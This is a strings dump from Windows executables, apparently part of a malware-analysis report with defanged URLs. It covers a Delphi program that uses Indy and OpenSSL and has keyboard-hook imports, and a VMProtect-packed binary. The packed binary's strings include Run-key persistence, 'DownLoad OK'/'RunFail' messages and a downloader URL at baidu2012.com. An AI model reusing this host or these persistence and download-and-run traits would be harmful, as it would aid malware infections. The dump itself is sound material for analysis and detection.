X509_CERT_PAIR_free
X509_CERT_PAIR_it
X509_CERT_PAIR_new
X509_CRL_get0_by_cert
X509_CRL_http_nbio
X509_PKEY_free
X509_PKEY_new
X509_PUBKEY_free
X509_PUBKEY_get0_param
X509_PUBKEY_it
X509_PUBKEY_new
X509_PUBKEY_set
X509_PUBKEY_set0_param
X509_REQ_check_private_key
X509_REQ_get_pubkey
X509_STORE_CTX_set_cert
X509_STORE_get1_certs
X509_certificate_type
X509_check_private_key
X509_get0_pubkey_bitstr
X509_get_default_cert_area
X509_get_default_cert_dir
X509_get_default_cert_dir_env
X509_get_pubkey
X509_get_pubkey_parameters
X509_http_nbio
X509_keyid_get0
X509_keyid_set1
X509_load_cert_crl_file
X509_load_cert_file
X509_pubkey_digest
X509_supported_extension
X509_verify_cert
X509_verify_cert_error_string
_ossl_old_des_is_weak_key
_ossl_old_des_key_sched
_ossl_old_des_random_key
_ossl_old_des_read_2passwords
_ossl_old_des_read_password
_ossl_old_des_string_to_2keys
_ossl_old_des_string_to_key
_shadow_DES_check_key
b2i_PrivateKey
b2i_PrivateKey_bio
b2i_PublicKey
b2i_PublicKey_bio
d2i_AUTHORITY_KEYID
d2i_CERTIFICATEPOLICIES
d2i_DSAPrivateKey_bio
d2i_DSAPrivateKey_fp
d2i_DSAPublicKey
d2i_DSA_PUBKEY
d2i_DSA_PUBKEY_bio
d2i_DSA_PUBKEY_fp
d2i_ECPrivateKey
d2i_ECPrivateKey_bio
d2i_ECPrivateKey_fp
d2i_EC_PUBKEY
d2i_EC_PUBKEY_bio
d2i_EC_PUBKEY_fp
d2i_ESS_CERT_ID
d2i_ESS_SIGNING_CERT
d2i_EXTENDED_KEY_USAGE
d2i_KRB5_ENCKEY
d2i_NETSCAPE_CERT_SEQUENCE
d2i_OCSP_CERTID
d2i_OCSP_CERTSTATUS
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
d2i_PKCS8_PRIV_KEY_INFO
d2i_PKCS8_PRIV_KEY_INFO_bio
d2i_PKCS8_PRIV_KEY_INFO_fp
d2i_PKEY_USAGE_PERIOD
d2i_PROXY_CERT_INFO_EXTENSION
d2i_PUBKEY
d2i_PUBKEY_bio
d2i_PUBKEY_fp
d2i_PrivateKey_fp
d2i_RSAPrivateKey_bio
d2i_RSAPrivateKey_fp
d2i_RSAPublicKey_bio
d2i_RSAPublicKey_fp
d2i_RSA_PUBKEY
d2i_RSA_PUBKEY_bio
d2i_RSA_PUBKEY_fp
d2i_TS_MSG_IMPRINT
d2i_TS_MSG_IMPRINT_bio
d2i_TS_MSG_IMPRINT_fp
d2i_X509_CERT_AUX
d2i_X509_CERT_PAIR
d2i_X509_PKEY
d2i_X509_PUBKEY
i2b_PrivateKey_bio
i2b_PublicKey_bio
i2d_AUTHORITY_KEYID
i2d_CERTIFICATEPOLICIES
i2d_DSAPrivateKey_bio
i2d_DSAPrivateKey_fp
i2d_DSAPublicKey
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY_bio
i2d_DSA_PUBKEY_fp
i2d_ECPrivateKey
i2d_ECPrivateKey_bio
i2d_ECPrivateKey_fp
i2d_EC_PUBKEY
i2d_EC_PUBKEY_bio
i2d_EC_PUBKEY_fp
i2d_ESS_CERT_ID
i2d_ESS_SIGNING_CERT
i2d_EXTENDED_KEY_USAGE
i2d_KRB5_ENCKEY
i2d_OCSP_CERTID
i2d_OCSP_CERTSTATUS
i2d_PKCS8PrivateKeyInfo_bio
i2d_PKCS8PrivateKeyInfo_fp
i2d_PKCS8PrivateKey_bio
i2d_PKCS8PrivateKey_fp
i2d_PKCS8PrivateKey_nid_bio
i2d_PKCS8PrivateKey_nid_fp
i2d_PKCS8_PRIV_KEY_INFO
i2d_PKCS8_PRIV_KEY_INFO_bio
i2d_PKCS8_PRIV_KEY_INFO_fp
i2d_PKEY_USAGE_PERIOD
i2d_PROXY_CERT_INFO_EXTENSION
i2d_PUBKEY
i2d_PUBKEY_bio
i2d_PUBKEY_fp
i2d_PrivateKey_fp
i2d_RSAPrivateKey_bio
i2d_RSAPrivateKey_fp
i2d_RSAPublicKey_bio
i2d_RSAPublicKey_fp
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY_bio
i2d_RSA_PUBKEY_fp
i2d_TS_MSG_IMPRINT
i2d_TS_MSG_IMPRINT_bio
i2d_TS_MSG_IMPRINT_fp
i2d_X509_CERT_AUX
i2d_X509_CERT_PAIR
i2d_X509_PKEY
i2d_X509_PUBKEY
i2o_ECPublicKey
idea_set_decrypt_key
idea_set_encrypt_key
o2i_ECPublicKey
private_AES_set_decrypt_key
private_AES_set_encrypt_key
private_RC4_set_key
w".pB
%CyYA0hD
R.ARu
.Slv&
4WURl."
SK-Ww}
R.Vd0
7'#.Smbi
P%s_t.
PX.DR*
vZ %D
.FA;r
.sPI0h
\.tP,
cPhhTtp\p
\.HLPT.
\.lptx.
<|%x-t
X.Cr&
M^.WLA
pen" 1.0.2e 3 Dec 201N
master_key
is %d?)`
'o'%s:%d: re
ng)msg_hdr->
%ld (%s\f
RgKey-Arg
c&cmd=U
|PKEY
SSLEAY32.dll
SSL_CONF_cmd
SSL_CONF_cmd_argv
SSL_CONF_cmd_value_type
SSL_CTX_get0_certificate
SSL_CTX_get0_privatekey
SSL_CTX_get_cert_store
SSL_CTX_get_client_cert_cb
SSL_CTX_set_cert_cb
SSL_CTX_set_cert_store
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_engine
SSL_CTX_set_msg_callback
SSL_CTX_set_srp_password
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate_ASN1
SSL_add_dir_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_certs_clear
SSL_check_private_key
SSL_export_keying_material
SSL_extension_supported
SSL_get_certificate
SSL_get_peer_cert_chain
SSL_get_privatekey
SSL_set_cert_cb
SSL_set_msg_callback
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_file
LoginDialog
Database Login
&Password:
PasswordChar
PasswordDialog
Enter password
GetWindowsDirectoryA
GetCPInfo
RegQueryInfoKeyA
RegOpenKeyExW
RegOpenKeyExA
RegLoadKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetKeyboardType
.idata
.rdata
P.reloc
P.rsrc
*<>#%"{}|\^[]`
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2001/XMLSchema-instance
hXXp://google.com
888816666554443
6666554443
!6666554443
TLOGINDIALOG
TPASSWORDDIALOG
CRefresh is only supported if the FileName or XML properties are set
Unnamed)"%s" DOMImplementation already registered
No matching DOM Vendor: "%s"<Selected DOM Vendor does not support this property or method;Property or Method "%s" is not supported by DOM Vendor "%s"
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
CArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Cannot describe type [%d].
%sHSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
ZUnsupported OCI library [%s] version [%s].
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supported
"VARIABLE has unsupported data typeÊnnot execute command. Not logged onlNo script commands registered.
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Supported are client and server from v 3.20 to v 6.2
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
No cursors availableCCannot initialize OCI with character set [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)
Cannot read [%s] property
Cannot read [%s] object#Cannot read RAW data of [%s] object
Class [%s] is not registered
Unknown storage format [%s]"Cannot move file [%s] to [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
;Destination text data file name or stream must be specified6Source text data file name or stream must be specified=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
%s?Undefined source field or expression for destination field [%s]
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Maximal number [%d] of simultaneous items (connections) reached.@.
To register it, you can drop component [%s] into your project>.
To register it, you can include unit [%s] into your project
Connection [%s] is not found
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Connection [%s] must be online
Table adapter [%s] cannot be assigned to [%s], because it is
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Text field [%s] is not found
GCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Possible reasons: %saupdate table does not have PK or row identifier,
record has been changed/deleted by another user<Operation cannot be performed without assigned SelectCommand
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] cannot be pooled.
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
TADConnection.Params has additional parameters
zParameter [%s] data type is unknown.
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported&Column [%s] data type is not supported
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Expected number of parameters is [%d], but actual number is [%d].
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Hint: set the TADParam.Size to a greater value
Database [%s] does not exist
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be active
vCannot load vendor library [%s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Character [%s] is missed
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Cannot parse object name - [%s])Syntax error in escape function [%s].
%shADPhysManager shutdown timeout.
NTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %seDriver ID is not defined.
Set TADConnection.DriverName or add DriverID to your connection definition
Capability is not supported
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
with dataset [%s] key fields [%s] Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
%sXDriver [%s] cannot be released.
Expected [%s].Arithmetic in filter expressions not supported>Operation cannot mix aggregate value with record-varying value
%s&Bookmark is not found for dataset [%s]
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Cannot open dataset [%s].
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]
FAssigning value [%s] is not compatible with column [%s] data type.
%s,Value [%s] is out of range of [%s] data typeuColumn or function [%s] is not found.
Invalid use of keyword
Invalid character found [%s]
'(' expected but [%s] found"')' or ',' expected but [%s] found
')' expected but [%s] found"IN predicate list may not be empty
)Column [%s] is not reference to other row'Column [%s] is not reference to row set&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
Value length - [%d], column maximum length - [%d]
Invalid foreign key [%s]
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Value length - [%d], column fixed length - [%d]
Column [%s] is read only
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot compare rowsÚta type conversion is not supported
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
Windows 8.1
Windows Server 2012 R2
Invalid MMF name "%s"*The MMF named "%s" cannot be created empty
Win32 error: %s (%u)%s%s#Name [%s] is duplicated in the list
Object [%s] is not found(Column [%s] type is unknown or undefined
Constraint [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Invalid stream operation
Error(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
"%s" does not match RootKey
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
SEC_E_NO_KERB_KEY5The certificate is not valid for the requested usage.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.
DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
The credentials supplied were not complete, and could not be verified. Additional information can be returned from the context.4The context data must be renegotiated with the peer.'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
The logon attempt failed;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate*Missing a Low Surrogate in UTF-16 sequence
Failed to load %s.
SSL status: "%s"
%s Alert
%s Read Alert
%s Write Alert
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Command not supported.
Address type not supported."%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
Object type not supported.
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket Error # %d
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Remote Login
Invalid destination array"Character index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
$Could not parse SQL TimeStamp string
Invalid SQL date/time values
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
No help keyword specified. Field '%s' is of an unknown type#Value of field '%s' is out of range
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
%s is not a valid BCD value
/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Unsupported clipboard format
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property element: %s
Invalid property type: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
I/O error %d
The OpenSSL Project, hXXp://VVV.openssl.org/
1.0.2e
Compiled by Frederik A. Winkelsdorf (opendec.wordpress.com) for the Indy Project (VVV.indyproject.org)
()* ,|-.

05a00036.exe_304:

.text
`.rdata
@.data
.vmp0
`.vmp1
`.reloc
@.rsrc
SSSSh
t'SShl
u$SShe
@ SSHPWj
tWSShW
tl9_ tgSSh
j%XtL9E
FtPW
SSh@B
FTCP
u.PhL{R
tAHt.HHt
<SShG
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AppHelper
Software\Microsoft\Windows\CurrentVersion\Run
%d / %d
Clean %s
RunFail %s
DownLoad OK %s
{330E0138-BC74-4A70-BA33-0B94FF648432}.tmp
hXXp://now.baidu2012.com/spare.txt
FileUrl
List:%s
*.txt
PathIsUrl false
RegDeleteKeyExW
WatchDesktop FindFile %s
del error %d
not found %s
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
KERNEL32.DLL
%s%s.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
CCmdTarget
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
comctl32.dll
comdlg32.dll
shell32.dll
CNotSupportedException
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
kernel32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
RegDeleteKeyExA
lXXxXXXXXXXX
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ole32.dll
MFCLink_UrlPrefix
MFCLink_Url
CMDIChildWnd
CMDIFrameWnd
&%d %s
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
%sPane-%d%x
%sPane-%d
ShowCmd
Hex={X,X,X}
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
%c%d%c%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
windows
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
RGB(%d, %d, %d)
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
operator
GetProcessWindowStation
R|}.mgD~
`Q%di@t]
.?AVCCmdTarget@@
.PAVCException@@
.?AVCCmdUI@@
.PAVCMemoryException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCFileException@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDV12@PBD@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.PAVCArchiveException@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
